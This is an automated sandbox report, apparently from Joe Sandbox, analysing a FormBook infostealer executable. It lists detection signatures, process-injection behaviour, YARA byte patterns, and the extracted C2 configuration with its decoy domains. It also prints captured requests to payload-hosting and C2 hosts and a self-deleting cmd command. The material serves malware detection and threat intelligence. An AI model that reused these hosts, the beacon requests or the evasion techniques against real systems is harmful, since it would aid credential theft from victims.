Windows Analysis Report
U8RYIwIvfK.exe

Overview

General Information

Sample Name:U8RYIwIvfK.exe
Analysis ID:736964
MD5:6f53598b9c19b30a0cf3ff0432301708
SHA1:4bd8e67e468adfbfddd9e5a1e47fdf318bf9a31b
SHA256:6d3397c687aea5017b90a5e96adc6fbfb0429d56a8b2ead1f1d4273994952379
Tags:exe, Formbook

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
.NET source code references suspicious native API functions
Machine Learning detection for sample
Allocates memory in foreign processes
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to communicate with device drivers
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • U8RYIwIvfK.exe (PID: 5840 cmdline: C:\Users\user\Desktop\U8RYIwIvfK.exe MD5: 6F53598B9C19B30A0CF3FF0432301708)
    • aspnet_compiler.exe (PID: 5140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • aspnet_compiler.exe (PID: 6124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • aspnet_compiler.exe (PID: 6120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5916 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 4120 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.ept-egy.com/zx85/"], "decoy": ["myclassly.com", "rilcon.xyz", "miracleun.shop", "gadgetward-usa.com", "farmaacademy.com", "dreamsolutions.group", "fffood.online", "ziggnl.site", "cherpol.com", "imprescriptible-tienoscope.biz", "yztc.fun", "chicagonftweek.com", "zz0659.com", "hznaixi.com", "027-seo.net", "korlekded.com", "gelatoitaly.com", "finlitguru.com", "gupingapp.com", "manmakecoffee.com", "yuanwei.lol", "cargovoyager.com", "getjobzz.com", "dagatructiephd.com", "mynab.mobi", "masteralbert.com", "rtugwmt0cs.vip", "uscanvas.net", "nocrytech.com", "canadaroi.com", "archivegamer.com", "crossinspectionservices.com", "dxxws.com", "rufflyfedogtraining.com", "prgrn.dev", "bwdcourses.com", "criptomexico.com", "elisabethingram.online", "drationa.shop", "pulsarthermalscope.shop", "grcpp8vyuk.vip", "sh-whyyl.com", "in-cdn.xyz", "aquatabdouro.online", "handsomeshooterjewelry.com", "erug.store", "trueimpact.studio", "taskalso.com", "dzslqdz.xyz", "barbushing.com", "freightxpert.com", "777703.xyz", "bradysproducts.com", "teensforcp.site", "gpssystemecuador.com", "luxslides.com", "sony8ktv.monster", "baxiservisim.xyz", "lojascacau.com", "sfanci.com", "magdrade.com", "jobreadyfresher.com", "dori-maniacs.com", "mercydm.mobi"]}
Source | Rule | Description | Author | Strings
00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x5251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1bbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x99bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x148a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x958a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x17839:$sqlite3step: 68 34 1C 7B E1
    • 0x1794c:$sqlite3step: 68 34 1C 7B E1
    • 0x17868:$sqlite3text: 68 38 2A 90 C5
    • 0x1798d:$sqlite3text: 68 38 2A 90 C5
    • 0x1787b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x179a3:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      Source | Rule | Description | Author | Strings
      3.0.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      3.0.aspnet_compiler.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      3.0.aspnet_compiler.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      3.0.aspnet_compiler.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17a39:$sqlite3step: 68 34 1C 7B E1
        • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a68:$sqlite3text: 68 38 2A 90 C5
        • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
        No Sigma rule has matched
        Timestamp: 11/03/22-12:39:59.450093
        Source IP: 50.115.174.192
        Destination IP: 192.168.2.6
        SID: 2018856
        Source Port: 443
        Destination Port: 49704
        Protocol: TCP
        Classtype: A Network Trojan was detected

        Timestamp: 11/03/22-12:39:56.025984
        Source IP: 192.168.2.6
        Destination IP: 8.8.8.8
        SID: 2012811
        Source Port: 59575
        Destination Port: 53
        Protocol: UDP
        Classtype: Potentially Bad Traffic

        AV Detection

        Source: U8RYIwIvfK.exe | ReversingLabs: Detection: 43%
        Source: U8RYIwIvfK.exe | Virustotal: Detection: 38%
        Source: Yara match | File source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: https://tgc8x.tk/tt/ptrr.txt | Avira URL Cloud: Label: phishing
        Source: https://tgc8x.tk/tt/BLACKDEV.txt | Avira URL Cloud: Label: phishing
        Source: tgc8x.tk | Virustotal: Detection: 5%
        Source: https://tgc8x.tk | Virustotal: Detection: 6%
        Source: U8RYIwIvfK.exe | Joe Sandbox ML: detected
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.ept-egy.com/zx85/"], "decoy": ["myclassly.com", "rilcon.xyz", "miracleun.shop", "gadgetward-usa.com", "farmaacademy.com", "dreamsolutions.group", "fffood.online", "ziggnl.site", "cherpol.com", "imprescriptible-tienoscope.biz", "yztc.fun", "chicagonftweek.com", "zz0659.com", "hznaixi.com", "027-seo.net", "korlekded.com", "gelatoitaly.com", "finlitguru.com", "gupingapp.com", "manmakecoffee.com", "yuanwei.lol", "cargovoyager.com", "getjobzz.com", "dagatructiephd.com", "mynab.mobi", "masteralbert.com", "rtugwmt0cs.vip", "uscanvas.net", "nocrytech.com", "canadaroi.com", "archivegamer.com", "crossinspectionservices.com", "dxxws.com", "rufflyfedogtraining.com", "prgrn.dev", "bwdcourses.com", "criptomexico.com", "elisabethingram.online", "drationa.shop", "pulsarthermalscope.shop", "grcpp8vyuk.vip", "sh-whyyl.com", "in-cdn.xyz", "aquatabdouro.online", "handsomeshooterjewelry.com", "erug.store", "trueimpact.studio", "taskalso.com", "dzslqdz.xyz", "barbushing.com", "freightxpert.com", "777703.xyz", "bradysproducts.com", "teensforcp.site", "gpssystemecuador.com", "luxslides.com", "sony8ktv.monster", "baxiservisim.xyz", "lojascacau.com", "sfanci.com", "magdrade.com", "jobreadyfresher.com", "dori-maniacs.com", "mercydm.mobi"]}
        Source: unknown | HTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49701 version: TLS 1.2
        Source: U8RYIwIvfK.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: aspnet_compiler.pdb source: cmd.exe, 0000000E.00000002.524907250.00000000031EF000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000002.521097994.00000000027ED000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: BFXBNFDHDJNG.pdb source: U8RYIwIvfK.exe
        Source: Binary string: cmd.pdb source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_001C245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_001BB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_001C68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_001D31DC FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_001B85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h

        Networking

        Source: C:\Windows\explorer.exe | Domain query: www.mercydm.mobi
        Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
        Source: Traffic | Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 50.115.174.192:443 -> 192.168.2.6:49704
        Source: Traffic | Snort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.2.6:59575 -> 8.8.8.8:53
        Source: Malware configuration extractor | URLs: www.ept-egy.com/zx85/
        Source: Joe Sandbox View | ASN Name: VIRPUS VIRPUS
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global traffic | HTTP traffic detected:
            GET /tt/ptrr.txt HTTP/1.1
            Host: tgc8x.tk
            Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
            GET /tt/BLACKDEV.txt HTTP/1.1
            Host: tgc8x.tk
        Source: global traffic | HTTP traffic detected:
            GET /zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt HTTP/1.1
            Host: www.mercydm.mobi
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: Joe Sandbox View | IP Address: 50.115.174.192 50.115.174.192
        Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 403 Forbidden
            Server: openresty
            Date: Thu, 03 Nov 2022 11:41:36 GMT
            Content-Type: text/html
            Content-Length: 291
            ETag: "635276ab-123"
            Via: 1.1 google
            Connection: close
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
        Source: U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tgc8x.tk
        Source: explorer.exe, 00000004.00000000.295686843.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.352239311.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.315487552.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.270907548.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341973422.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tgc8x.tk
        Source: U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.268543578.0000000002755000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tgc8x.tk/tt/BLACKDEV.txt
        Source: U8RYIwIvfK.exe, 00000000.00000002.268352878.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tgc8x.tk/tt/ptrr.txt
        Source: U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tgc8x.tk4
        Source: U8RYIwIvfK.exe, 00000000.00000002.268543578.0000000002755000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tgc8x.tkD8
        Source: unknown | DNS traffic detected: queries for: tgc8x.tk
        Source: global traffic | HTTP traffic detected:
            GET /tt/ptrr.txt HTTP/1.1
            Host: tgc8x.tk
            Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
            GET /tt/BLACKDEV.txt HTTP/1.1
            Host: tgc8x.tk
        Source: global traffic | HTTP traffic detected:
            GET /zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt HTTP/1.1
            Host: www.mercydm.mobi
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: unknown | HTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49701 version: TLS 1.2

        E-Banking Fraud

        Source: Yara match | File source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
